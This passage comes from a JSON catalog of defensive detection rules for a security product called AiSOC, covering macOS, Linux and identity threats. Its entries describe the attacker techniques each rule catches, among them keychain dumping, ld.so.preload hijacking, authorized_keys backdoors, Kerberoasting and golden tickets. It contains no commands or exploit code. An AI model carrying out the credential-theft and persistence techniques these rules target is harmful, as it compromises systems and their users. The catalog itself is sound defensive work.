Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1543" ], "log_source": "osquery", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/osquery-macos-kextload.yaml" }, { "id": "det-endpoint-290", "type": "detection", "name": "macOS Keychain Dumping Attempt", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'macOS Keychain Dumping Attempt'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1555.001" ], "log_source": "osquery", "playbook": "tpl-credential-theft", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/osquery-macos-keychain-dump.yaml" }, { "id": "det-endpoint-291", "type": "detection", "name": "macOS System Log Removed or Manually Rotated", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'macOS System Log Removed or Manually Rotated'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1070" ], "log_source": "osquery", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/osquery-macos-log-removal.yaml" }, { "id": "det-endpoint-292", "type": "detection", "name": "macOS LoginHook Persistence via defaults write", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'macOS LoginHook Persistence via defaults write'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1037.002" ], "log_source": "osquery", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/osquery-macos-loginhook-persistence.yaml" }, { "id": "det-endpoint-293", "type": "detection", "name": "macOS Suspicious Living-Off-The-Land Binary Execution", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'macOS Suspicious Living-Off-The-Land Binary Execution'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1059.004" ], "log_source": "osquery", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/osquery-macos-lolbin-execution.yaml" }, { "id": "det-endpoint-294", "type": "detection", "name": "macOS Network Share Discovery via showmount or smbutil", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'macOS Network Share Discovery via showmount or smbutil'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1135" ], "log_source": "osquery", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/osquery-macos-network-share-discovery.yaml" }, { "id": "det-endpoint-295", "type": "detection", "name": "macOS Plist Modification via plutil", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'macOS Plist Modification via plutil'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1647" ], "log_source": "osquery", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/osquery-macos-plutil-plist-modification.yaml" }, { "id": "det-endpoint-296", "type": "detection", "name": "Process Tapping macOS Keyboard Events", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Process Tapping macOS Keyboard Events'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1056.001" ], "log_source": "osquery", "playbook": "tpl-collection", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/osquery-macos-keyboard-event-tap.yaml" }, { "id": "det-endpoint-297", "type": "detection", "name": "Sensitive System File Modified (FIM)", "description": "A file in a sensitive system path (/etc/passwd, /etc/shadow, /etc/sudoers, /etc/crontab, /etc/hosts, /etc/ssh/sshd_config, /etc/ld.so.*) was created, deleted, or modified as reported by osquery file_events via the AiSOC FIM pipeline. Adversaries commonly target these files for credential theft (T1003.008), persistence (T1037, T1053.003), lateral movement, and privilege escalation (T1548.001).", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white", "data_source.osquery", "data_source.fim" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1003.008", "T1037", "T1053.003", "T1548.001" ], "log_source": "osquery", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/fim-sensitive-file-modified.yaml" }, { "id": "det-endpoint-298", "type": "detection", "name": "Executable Dropped in World-Writable Directory (FIM)", "description": "An osquery file_events CREATED event was recorded for a file with a common executable extension (.sh, .py, .pl, .rb, .elf, .bin, no extension + executable path) under a world-writable path (/tmp, /var/tmp, /dev/shm, /run/shm). This is a classic indicator of malware staging, web shell deployment, or attacker tool transfer (T1027, T1059, T1036.005).", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white", "data_source.osquery", "data_source.fim" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1027", "T1059", "T1036.005", "T1570" ], "log_source": "osquery", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/fim-binary-dropped-writable-dir.yaml" }, { "id": "det-endpoint-299", "type": "detection", "name": "LD_PRELOAD / ld.so.preload Tampered (FIM)", "description": "The dynamic linker preload file /etc/ld.so.preload or any shared library under /etc/ld.so.conf.d/ was created or modified, as detected by osquery file_events via the AiSOC FIM pipeline. Attackers use ld.so.preload to inject arbitrary shared libraries into every process at startup, achieving rootkit-level stealth, credential capture, or privilege escalation (T1574.006 \u2013 Dynamic Linker Hijacking).", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white", "data_source.osquery", "data_source.fim" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1574.006", "T1014", "T1548.001" ], "log_source": "osquery", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/fim-ld-preload-modified.yaml" }, { "id": "det-endpoint-300", "type": "detection", "name": "SSH authorized_keys File Modified (FIM)", "description": "An osquery file_events event recorded a change (CREATED, UPDATED, or ATTRIBUTES_MODIFIED) to any ~/.ssh/authorized_keys file across the fleet. Adversaries add their own public keys to authorized_keys files to establish persistent SSH backdoors that survive password resets and remain invisible to normal login monitoring (T1098.004 \u2013 Account Manipulation: SSH Authorized Keys).", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white", "data_source.osquery", "data_source.fim" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1098.004", "T1078", "T1136" ], "log_source": "osquery", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/fim-ssh-authorized-keys-changed.yaml" }, { "id": "det-endpoint-301", "type": "detection", "name": "Sudoers Tampering Via auditd Watch", "description": "Triggers when the AiSOC auditd profile (profiles/auditd/aisoc.rules)\nrecords a write to /etc/sudoers or any file under /etc/sudoers.d/.\nPivots on the auditd_key field exposed by services/connectors/app/connectors/auditd.py\nso the rule fires regardless of which syscall (open, openat, rename, etc.)\nproduced the event. Sudoers changes are extremely high-signal in steady-state\nand are the most reliable indicator of attacker-driven privilege escalation\nshort of a full root shell.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1548.003", "T1098" ], "log_source": "linux", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-auditd-sudoers-tampering.yaml" }, { "id": "det-endpoint-302", "type": "detection", "name": "SSH Config Or Authorized Keys Tampering Via auditd Watch", "description": "Triggers when the AiSOC auditd profile records a write to /etc/ssh/sshd_config,\n/etc/ssh/sshd_config.d/, or /root/.ssh/authorized_keys. Pivots on the\nauditd_key field so the rule fires for any modify-class syscall (open, openat,\nrename, link, unlink) without needing a per-syscall companion rule.\nSSH config + root authorized_keys are the two most common backdoor footholds\non Linux servers; production hosts should see zero modifications outside of\nconfig-management runs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1098.004", "T1556" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-auditd-ssh-config-tampering.yaml" }, { "id": "det-endpoint-303", "type": "detection", "name": "Kernel Module Load Or Unload Via auditd Watch", "description": "Triggers when the AiSOC auditd profile records init_module / finit_module /\ndelete_module syscalls or execution of /sbin/insmod, /sbin/rmmod, /sbin/modprobe.\nPivots on auditd_key so the rule fires regardless of how the kernel module\nprimitive was invoked. Loadable kernel modules are the standard delivery\nvehicle for Linux rootkits (Diamorphine, Reptile, Symbiote, etc.); legitimate\nmodule loads are dominated by boot-time systemd-modules-load.service and\nfilesystem drivers and should be easy to allowlist by parent process.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1547.006", "T1014" ], "log_source": "linux", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-auditd-kernel-module-load.yaml" }, { "id": "det-endpoint-304", "type": "detection", "name": "Systemd Unit Persistence Via auditd Watch", "description": "Triggers when the AiSOC auditd profile records a write under\n/etc/systemd/system/ or /lib/systemd/system/. Pivots on auditd_key so the\nrule fires for any modify-class syscall on a unit file without a per-syscall\ncompanion rule. Dropping a .service or .timer file under these directories is\nthe canonical Linux persistence technique post-foothold; legitimate writes\nare dominated by package managers and configuration-management agents and\nshould be straightforward to allowlist.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1543.002", "T1053.006" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-auditd-systemd-persistence.yaml" }, { "id": "det-identity-001", "type": "detection", "name": "Authentication Brute-Force Burst", "description": "Detects high-frequency failed authentication attempts against a single account, which is a classic indicator of credential-stuffing or password-spraying attempts. Threshold is intentionally conservative to reduce noise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1110.001" ], "log_source": "okta", "playbook": "tpl-account-compromise", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/brute-force-login.yaml" }, { "id": "det-identity-002", "type": "detection", "name": "Impossible Travel Between Two Authentications", "description": "Detects two successful authentication events for the same user from geographically distant locations within a time window that would require travel speeds exceeding 800 km/h. Strong indicator of compromised credentials being shared between attacker and legitimate user.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "okta", "playbook": "tpl-account-compromise", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/impossible-travel.yaml" }, { "id": "det-identity-003", "type": "detection", "name": "Password Spray Across Many Users from Single IP", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Password Spray Across Many Users from Single IP'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1110.003" ], "log_source": "okta", "playbook": "tpl-account-compromise", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/password-spray.yaml" }, { "id": "det-identity-004", "type": "detection", "name": "Login from Tor / Anonymous Proxy", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Login from Tor / Anonymous Proxy'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "okta", "playbook": "tpl-account-compromise", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/login-anonymous-ip.yaml" }, { "id": "det-identity-005", "type": "detection", "name": "Privileged Login Outside Business Hours", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Privileged Login Outside Business Hours'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "okta", "playbook": "tpl-account-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/login-outside-business-hours.yaml" }, { "id": "det-identity-006", "type": "detection", "name": "Login from Country Outside Allowed Geography", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Login from Country Outside Allowed Geography'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "okta", "playbook": "tpl-account-compromise", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/login-from-foreign-country.yaml" }, { "id": "det-identity-007", "type": "detection", "name": "Authentication Attempt Against Disabled Account", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Authentication Attempt Against Disabled Account'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "okta", "playbook": "tpl-account-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/disabled-account-login-attempt.yaml" }, { "id": "det-identity-008", "type": "detection", "name": "MFA Push Bombing (MFA Fatigue)", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'MFA Push Bombing (MFA Fatigue)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1621" ], "log_source": "okta", "playbook": "tpl-account-compromise", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/mfa-fatigue.yaml" }, { "id": "det-identity-009", "type": "detection", "name": "MFA Requirement Removed from User Policy", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'MFA Requirement Removed from User Policy'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1556.006" ], "log_source": "okta", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/mfa-bypass-policy-change.yaml" }, { "id": "det-identity-010", "type": "detection", "name": "Authentication with Expired Credential", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Authentication with Expired Credential'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1110" ], "log_source": "okta", "playbook": "tpl-account-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/expired-credential-reuse.yaml" }, { "id": "det-identity-011", "type": "detection", "name": "Service Account Used for Interactive Login", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Service Account Used for Interactive Login'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1078.004" ], "log_source": "okta", "playbook": "tpl-account-compromise", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/service-account-interactive-login.yaml" }, { "id": "det-identity-012", "type": "detection", "name": "Root SSH Login on Production Host", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Root SSH Login on Production Host'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1078.001" ], "log_source": "linux", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/root-ssh-login.yaml" }, { "id": "det-identity-013", "type": "detection", "name": "Login with Vendor Default Credentials", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Login with Vendor Default Credentials'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1078.001" ], "log_source": "linux", "playbook": "tpl-account-compromise", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/default-credential-login.yaml" }, { "id": "det-identity-014", "type": "detection", "name": "Shared Account Login Spike (Distinct IPs)", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Shared Account Login Spike (Distinct IPs)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "okta", "playbook": "tpl-account-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/shared-account-login-spike.yaml" }, { "id": "det-identity-015", "type": "detection", "name": "Authentication During Active P0/P1 Incident Window", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Authentication During Active P0/P1 Incident Window'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "okta", "playbook": "tpl-incident-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/login-during-incident.yaml" }, { "id": "det-identity-016", "type": "detection", "name": "Privileged Role Assignment", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Privileged Role Assignment'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1098" ], "log_source": "okta", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/privileged-role-assignment.yaml" }, { "id": "det-identity-017", "type": "detection", "name": "Just-In-Time Elevation Held Beyond Window", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Just-In-Time Elevation Held Beyond Window'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "okta", "playbook": "tpl-account-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/jit-elevation-abuse.yaml" }, { "id": "det-identity-018", "type": "detection", "name": "Sudo Used Without MFA", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Sudo Used Without MFA'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1548.003" ], "log_source": "linux", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/sudo-no-mfa.yaml" }, { "id": "det-identity-019", "type": "detection", "name": "Active Directory Group Policy Modified", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Active Directory Group Policy Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1484.001" ], "log_source": "windows", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/group-policy-modification.yaml" }, { "id": "det-identity-020", "type": "detection", "name": "Kubernetes ClusterRoleBinding to cluster-admin", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Kubernetes ClusterRoleBinding to cluster-admin'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1078.004" ], "log_source": "kubernetes", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/rbac-cluster-admin-binding.yaml" }, { "id": "det-identity-021", "type": "detection", "name": "Defensive IAM Policy Detached", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Defensive IAM Policy Detached'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1562.008" ], "log_source": "aws", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/iam-policy-detach-defense.yaml" }, { "id": "det-identity-022", "type": "detection", "name": "Domain Password Policy Weakened", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Domain Password Policy Weakened'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "windows", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/domain-password-policy-weakened.yaml" }, { "id": "det-identity-023", "type": "detection", "name": "OAuth App Granted Broad Scopes by User", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'OAuth App Granted Broad Scopes by User'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1098.001" ], "log_source": "google-workspace", "playbook": "tpl-account-compromise", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/oauth-broad-scope-grant.yaml" }, { "id": "det-identity-024", "type": "detection", "name": "GitHub App Installed with Repo Admin Permission", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'GitHub App Installed with Repo Admin Permission'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1098.001" ], "log_source": "github", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/app-token-broad-default.yaml" }, { "id": "det-identity-025", "type": "detection", "name": "Persistent Session Token Reused from New Device Fingerprint", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Persistent Session Token Reused from New Device Fingerprint'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1550.004" ], "log_source": "okta", "playbook": "tpl-account-compromise", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/token-reuse-new-device.yaml" }, { "id": "det-identity-026", "type": "detection", "name": "User Account Creation by Non-Admin Principal", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'User Account Creation by Non-Admin Principal'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1136.001" ], "log_source": "okta", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/account-creation-by-non-admin.yaml" }, { "id": "det-identity-027", "type": "detection", "name": "Privileged Account Deleted", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Privileged Account Deleted'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1531" ], "log_source": "okta", "playbook": "tpl-account-compromise", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/admin-account-deletion.yaml" }, { "id": "det-identity-028", "type": "detection", "name": "Disabled Account Re-enabled", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Disabled Account Re-enabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1098" ], "log_source": "okta", "playbook": "tpl-account-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/account-enable-after-disable.yaml" }, { "id": "det-identity-029", "type": "detection", "name": "Admin Password Reset Initiated by Self via Self-Service", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Admin Password Reset Initiated by Self via Self-Service'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1098" ], "log_source": "okta", "playbook": "tpl-account-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/self-password-reset-admin.yaml" }, { "id": "det-identity-030", "type": "detection", "name": "Password Reset Out of Business Hours for Privileged Account", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Password Reset Out of Business Hours for Privileged Account'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1098" ], "log_source": "okta", "playbook": "tpl-account-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/password-reset-out-of-hours.yaml" }, { "id": "det-identity-031", "type": "detection", "name": "Active Directory Replication Request from Non-Domain-Controller", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Active Directory Replication Request from Non-Domain-Controller'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1003.006" ], "log_source": "windows", "playbook": "tpl-credential-theft", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ad-replication-non-dc.yaml" }, { "id": "det-identity-032", "type": "detection", "name": "Kerberoasting (Service-Ticket Request for SPN)", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Kerberoasting (Service-Ticket Request for SPN)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1558.003" ], "log_source": "windows", "playbook": "tpl-credential-theft", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/kerberoasting.yaml" }, { "id": "det-identity-033", "type": "detection", "name": "AS-REP Roasting (Account with Pre-Auth Disabled)", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'AS-REP Roasting (Account with Pre-Auth Disabled)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1558.004" ], "log_source": "windows", "playbook": "tpl-credential-theft", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/asreproasting.yaml" }, { "id": "det-identity-034", "type": "detection", "name": "Golden Ticket Indicator (Anomalous TGT Lifetime)", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Golden Ticket Indicator (Anomalous TGT Lifetime)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1558.001" ], "log_source": "windows", "playbook": "tpl-credential-theft", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/golden-ticket.yaml" }, { "id": "det-identity-035", "type": "detection", "name": "Silver Ticket Indicator (Service Ticket Without TGS Hit)", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Silver Ticket Indicator (Service Ticket Without TGS Hit)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1558.002" ], "log_source": "windows", "playbook": "tpl-credential-theft", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/silver-ticket.yaml" }, { "id": "det-identity-036", "type": "detection", "name": "SAML Response with Mismatched Issuer or Future-Dated NotBefore", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'SAML Response with Mismatched Issuer or Future-Dated NotBefore'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1606.002" ], "log_source": "okta", "playbook": "tpl-credential-theft", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/saml-response-anomaly.yaml" }, { "id": "det-identity-037", "type": "detection", "name": "Federation Trust Relationship Modified", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Federation Trust Relationship Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1556.007" ], "log_source": "azure", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/federated-trust-modified.yaml" }, { "id": "det-identity-038", "type": "detection", "name": "IDP Metadata or Signing Cert Changed", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'IDP Metadata or Signing Cert Changed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "okta", "playbook": 